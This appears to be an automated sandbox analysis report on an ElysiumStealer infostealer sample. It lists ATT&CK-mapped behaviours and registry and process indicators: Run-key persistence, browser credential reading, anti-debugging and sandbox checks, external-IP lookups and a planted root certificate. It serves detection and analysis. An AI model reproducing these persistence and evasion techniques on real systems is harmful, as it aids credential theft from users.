elysiumstealer | 28f1bd1e02427a817d05c69884c5d5ccf3455859a2f1c3a6dce5e6da75141bcd

System Information Discovery

Processes:

2767745.30

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2767745.30
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2767745.30

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

ad6b33184b0ceb75c0d95fd68f495095.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation	ad6b33184b0ceb75c0d95fd68f495095.exe

Loads dropped DLL 3 IoCs

Processes:

updhhj.exeregsvr32.exe

pid process

2768 updhhj.exe
3564 regsvr32.exe
3564 regsvr32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\ProgramData\2767745.30	themida
C:\ProgramData\2767745.30	themida
behavioral2/memory/4576-119-0x0000000000400000-0x00000000014D7000-memory.dmp	themida

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

4582130.50pzysgf.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	4582130.50
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	pzysgf.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

Processes:

2767745.30md9_9sjm.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2767745.30
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_9sjm.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

11 ip-api.com
102 ipinfo.io
107 ipinfo.io
183 checkip.amazonaws.com
302 checkip.amazonaws.com
312 ip-api.com
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

2767745.30

pid process

4576 2767745.30
Drops file in Windows directory 1 IoCs

Processes:

MicrosoftEdge.exe

description ioc process

File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	ioc
11	ip-api.com
102	ipinfo.io
107	ipinfo.io
183	checkip.amazonaws.com
302	checkip.amazonaws.com
312	ip-api.com

pid	process
4576	2767745.30

description	ioc	process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Program crash 11 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5188	6056	WerFault.exe	winlthsth.exe
5648	5268	WerFault.exe	inuufz2vfip.exe
5452	5268	WerFault.exe	inuufz2vfip.exe
4668	5268	WerFault.exe	inuufz2vfip.exe
5496	5268	WerFault.exe	inuufz2vfip.exe
5924	5268	WerFault.exe	inuufz2vfip.exe
6988	5268	WerFault.exe	inuufz2vfip.exe
4408	5268	WerFault.exe	inuufz2vfip.exe
6260	5268	WerFault.exe	inuufz2vfip.exe
6712	7380	WerFault.exe	fJuOI2YWfyCka0ssldzPmaJK.exe
4252	5268	WerFault.exe	inuufz2vfip.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

updhhj.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	updhhj.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	updhhj.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	updhhj.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

6080 timeout.exe
6388 timeout.exe
Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

724 taskkill.exe
4956 taskkill.exe
5596 taskkill.exe
6216 taskkill.exe
7964 taskkill.exe

pid	process
6080	timeout.exe
6388	timeout.exe

pid	process
724	taskkill.exe
4956	taskkill.exe
5596	taskkill.exe
6216	taskkill.exe
7964	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

Processes:

MicrosoftEdge.exebrowser_broker.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 998267c856add601	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{31BECE70-A849-4CA3-9CC9-EED07E3E7B9A} = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "{19B60EFE-4916-43E3-B6D6-0A460866AB40}"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 998267c856add601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 998267c856add601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000eb4ecbaf031e7cdea5ccb0b68c6cad381b8997ac673f29d690f8b3301439c425923332590810fce4ab169375b36051b13631b068831c50fbcabe	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000006b346e6c836d099eb9dfa6ef0c38f11e9b265a5ee466374b1082870ade9c4f6568094ecbbc8f7d331698bcf211aa2b3cf4ef05402aab86ee4ed4d2677545670e8c2e92c3f4becdcd4c2be984da9177a2c25956f9c70ca946d0cf940a62f3208f2145e2ccdf1a7ebcb4366396e40d46e91705b3817eaba12749144f39e8c58ec70beded32a2c37061dd5b4cd72c3f36803f91df1d06a7b514d841c17ed7dd9ed6b2c53c48e4d90c9dbe39ff1f42455359549e9156cb1fc8502af873783c5a0cb96c6fd2a79f7c2a049a703283da4037e7cecc0d06503536bdacd77435715c6624328a4688f8ccbee9d7a0137841511b68f6bb43709e07688ce97fc623080395beabb5531ec2e9f0367d6977b038963084af0b5a6e1cb740c07e919890a76e93a37d923a0ea3f39d12026b446ff730f2386a5ddda8dd637f7dd8ab29b6fbbfb339c4bf4ef0ef0a2c5e3e461224bd3f26144c4fdce3622dfa27536f805813153b5485de67e1954e9ff7789a038e5fe48dc432824a56db333757fb7b2af75a9099a9388e912597dfa5d67e07d872113d2af37d963c174897e795a01413b0b328cca0cb055afbd9b9	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000b0cdd630b2f554e5924984c2c5e928b97035137066ce7b6a8f8fbb0e1da8bf54794ad9e2599fcaeeaaec2be4cc20fac4d330667dfbfc283465a5c464e08742ad344c167301bae477b43cea87e603fe1c620245f3f8d94876ad13	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

aszd.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	aszd.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20e